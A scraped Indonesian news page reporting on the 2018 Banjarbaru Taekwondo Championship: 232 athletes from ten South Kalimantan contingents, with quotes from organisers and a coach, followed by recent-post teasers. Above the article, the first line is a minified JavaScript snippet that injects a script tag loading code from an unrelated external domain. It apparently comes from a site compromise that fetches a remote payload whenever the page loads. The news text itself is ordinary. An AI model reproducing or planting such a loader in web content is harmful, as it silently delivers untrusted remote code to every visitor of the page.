(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Sport

232 Atlet Berlaga di Banjarbaru Taekwondo Championship 2018


BANJARBARU, Sedikitnya 232 taekwondoin di Kalsel berlaga dalam ajang Banjarbaru Taekwondo Championship (BTC) 2018, 20-22 April di Q Mall Banjarbaru.

Ada 10 kontingen yang menurunkan taekwondoin terbaik yakni dari Hulu Sungai Selatan (21 atlet), Tanah Laut (15 atlet), Kabupaten Banjar (17 atlet), Barito Kuala (24 atlet), Kota Banjarmasin (15 atlet), Tanah Bumbu (10 atlet), Kotabaru (63 atlet), tuan rumah Banjarbaru (42 atlet), SMKN 4 Banjarbaru (4 atlet) bersama 31 official.

Seni beladiri tendangan dan tinju asal Korea ini mempertandingan empat kategori usia 9-10 (pra kadet), usia 12-14 (kadet) junior 15-16 (junior) di atas 17 (senior). Taekwondo sendiri merupakan seni bela diri yang merupakan gabungan dalam teknik perkelahian, bela diri, olahraga, olah tubuh, hiburan, dan filsafat.

Kompetisi ini bertujuan untuk mencari bibit-bibit atlet taekwondo potensial untuk berlaga di tingkat regional dan nasional, juga sebagai tolak ukur pembinaan pengembangan di kabupaten kota se Kalsel.

“Tidak hanya sekedar pertandingan, disini kita mengasah kemampun anak-anak kita agar bisa bertanding ke pertandingan besar,” ujar Bambang, Ketua TI Kalsel.

“Junjung tinggi sportifitas jika ingin terbaik, jangan ragu untuk memasang target yang tinggi dan bisa bertanding pada kancah internasional, karena potensi kita ada,” ujar Ketua Panitia Penyelenggara BTC 2018 Johan Arifin.



Kontingen Kotabaru yang merupakan kota dengan peserta terbanyak yakni 63 altet dengan masing-masing kategori pra kadet dan kadet, satu atlet senior dan dua atlet junior.

“Karena pada BTC 2017 lalu kami menjadi juara umum, tahun ini kami membawa lebih banyak atlet supaya bjam terbang anak-anak lebih banyak,” ujar pelatih kontingen Kotabaru Tahta, kepada Kanal Kalimantan.

Menurut Tahta perkembangan taekwondo di Kotabaru dirasa sangat baik. Dengan banyaknya peserta yang ikut dan atlet yang berprestasi. (devi)

Reporter : Devi
Editor : Abi Zarrin Al Ghifari

Desy Arfianty

Recent Posts

15 Anggota Panwascam Dilantik, Bawaslu Banjarbaru langsung Berikan Bimtek Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Badan Pengawas Pemilu (Bawaslu) Kota Banjarbaru resmi melantik 15 anggota Panitia Pengawas… Read More

1 jam ago

Pangkalan LPG Diminta Tak Bermain Harga, Polres Banjarmasin Bentuk Tim Khusus

KANALKALIMANTAN.COM, BANJARMASIN - Satuan Reserse Kriminal (Satreskrim) Polresta Banjarmasin membentuk tim khusus untuk mengatasi permasalaha… Read More

2 jam ago

Langsung Pakai Ihram, Kloter 10 Asal HSU-Banjar-Banjarmasin Terbang ke Tanah Suci

KANALKALIMANTAN.COM, BANJARBARU - Jemaah Haji Kabupaten Hulu Sungai Utara (HSU) yang tergabung dalam Kelompok Terbang… Read More

8 jam ago

Safari Jum’at Pj Bupati Kapuas di Masjid Baiturrahman Tamban Catur

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas, Erlin Hardi melakukan Safari Jum’at di Masjid… Read More

10 jam ago

Aeris Hotel Banjarbaru Diberi SP 1, SLF dan Andalalin Belum Lengkap

KANALKALIMANTAN.COM, BANJARBARU – Tak miliki izin operasional, Hotel Aeris di Jalan Panglima Batur mendapat Surat… Read More

10 jam ago

Izin Operasional Aeris Hotel Belum Ada, Disporabudpar Banjarbaru Dapati Tamu Nginap

Manajemen Aeris Hotel: Masih Promosi, Ini untuk Mengetahui Dimana Error-nya Layanan Kita Read More

15 jam ago

This website uses cookies.